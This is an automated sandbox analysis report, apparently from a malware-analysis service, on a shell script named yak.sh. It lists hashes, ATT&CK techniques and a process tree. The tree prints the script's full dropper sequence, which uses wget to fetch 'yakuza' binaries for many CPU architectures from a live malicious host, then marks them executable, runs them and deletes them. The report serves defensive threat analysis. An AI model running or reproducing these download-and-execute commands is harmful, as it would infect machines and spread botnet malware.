ea83411bd7b6e5a7364f7b8b9018f0f17f7084aeb58a47736dd80c99cfeac7f1

Analysis

max time kernel
0s
max time network
129s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240729-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
19/10/2024, 11:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

yak.sh
Size

1KB
MD5

d38e8407bbc72cbd2057efdd3d8b7a05
SHA1

89e1ebb28cea58b8f9eb728383f8cb565d58518e
SHA256

ea83411bd7b6e5a7364f7b8b9018f0f17f7084aeb58a47736dd80c99cfeac7f1
SHA512

c0a0450a308555a0c3ff52d7d8fc0ce8ff55b9bca8b700cdf87b222b2bfe2ea112de21aa59a8535020b7d4636f64334606494da99e007caecb09ff3ae69589c9

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1509	chmod
1513	chmod
1520	chmod
1527	chmod
1541	chmod
1548	chmod
1565	chmod
1534	chmod
1558	chmod
1569	chmod
1576	chmod
1589	chmod
1593	chmod

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1505	wget
1510	yakuza.mips
1511	rm
1512	wget
1514	yakuza.mipsel
1515	rm

/tmp/yak.sh
/tmp/yak.sh
1⤵
PID:1504
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.mips
  2⤵
  - System Network Configuration Discovery
  PID:1505
- /bin/chmod
  chmod +x yakuza.mips
  2⤵
  - File and Directory Permissions Modification
  PID:1509
- /tmp/yakuza.mips
  ./yakuza.mips
  2⤵
  - System Network Configuration Discovery
  PID:1510
- /bin/rm
  rm -rf yakuza.mips
  2⤵
  - System Network Configuration Discovery
  PID:1511
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:1512
- /bin/chmod
  chmod +x yakuza.mipsel
  2⤵
  - File and Directory Permissions Modification
  PID:1513
- /tmp/yakuza.mipsel
  ./yakuza.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:1514
- /bin/rm
  rm -rf yakuza.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:1515
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.sh
  2⤵
  PID:1519
- /bin/chmod
  chmod +x yakuza.sh
  2⤵
  - File and Directory Permissions Modification
  PID:1520
- /tmp/yakuza.sh
  ./yakuza.sh
  2⤵
  PID:1521
- /bin/rm
  rm -rf yakuza.sh
  2⤵
  PID:1525
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.x86
  2⤵
  PID:1526
- /bin/chmod
  chmod +x yakuza.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1527
- /tmp/yakuza.x86
  ./yakuza.x86
  2⤵
  PID:1528
- /bin/rm
  rm -rf yakuza.x86
  2⤵
  PID:1529
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.arm6
  2⤵
  PID:1533
- /bin/chmod
  chmod +x yakuza.arm6
  2⤵
  - File and Directory Permissions Modification
  PID:1534
- /tmp/yakuza.arm6
  ./yakuza.arm6
  2⤵
  PID:1538
- /bin/rm
  rm -rf yakuza.arm6
  2⤵
  PID:1539
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.i686
  2⤵
  PID:1540
- /bin/chmod
  chmod +x yakuza.i686
  2⤵
  - File and Directory Permissions Modification
  PID:1541
- /tmp/yakuza.i686
  ./yakuza.i686
  2⤵
  PID:1545
- /bin/rm
  rm -rf yakuza.i686
  2⤵
  PID:1546
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.ppc
  2⤵
  PID:1547
- /bin/chmod
  chmod +x yakuza.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:1548
- /tmp/yakuza.ppc
  ./yakuza.ppc
  2⤵
  PID:1552
- /bin/rm
  rm -rf yakuza.ppc
  2⤵
  PID:1553
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.i586
  2⤵
  PID:1554
- /bin/chmod
  chmod +x yakuza.i586
  2⤵
  - File and Directory Permissions Modification
  PID:1558
- /tmp/yakuza.i586
  ./yakuza.i586
  2⤵
  PID:1559
- /bin/rm
  rm -rf yakuza.i586
  2⤵
  PID:1560
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.m68k
  2⤵
  PID:1561
- /bin/chmod
  chmod +x yakuza.m68k
  2⤵
  - File and Directory Permissions Modification
  PID:1565
- /tmp/yakuza.m68k
  ./yakuza.m68k
  2⤵
  PID:1566
- /bin/rm
  rm -rf yakuza.m68k
  2⤵
  PID:1567
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.arm4
  2⤵
  PID:1568
- /bin/chmod
  chmod +x yakuza.arm4
  2⤵
  - File and Directory Permissions Modification
  PID:1569
- /tmp/yakuza.arm4
  ./yakuza.arm4
  2⤵
  PID:1570
- /bin/rm
  rm -rf yakuza.arm4
  2⤵
  PID:1571
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.arm5
  2⤵
  PID:1575
- /bin/chmod
  chmod +x yakuza.arm5
  2⤵
  - File and Directory Permissions Modification
  PID:1576
- /tmp/yakuza.arm5
  ./yakuza.arm5
  2⤵
  PID:1577
- /bin/rm
  rm -rf yakuza.arm5
  2⤵
  PID:1581
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.arm7
  2⤵
  PID:1582
- /bin/chmod
  chmod +x yakuza.arm7
  2⤵
  - File and Directory Permissions Modification
  PID:1589
- /tmp/yakuza.arm7
  ./yakuza.arm7
  2⤵
  PID:1590
- /bin/rm
  rm -rf yakuza.arm7
  2⤵
  PID:1591
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.sparc
  2⤵
  PID:1592
- /bin/chmod
  chmod +x yakuza.sparc
  2⤵
  - File and Directory Permissions Modification
  PID:1593
- /tmp/yakuza.sparc
  ./yakuza.sparc
  2⤵
  PID:1594
- /bin/rm
  rm -rf yakuza.sparc
  2⤵
  PID:1598

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Windows 7 deprecation

Loading Replay Monitor...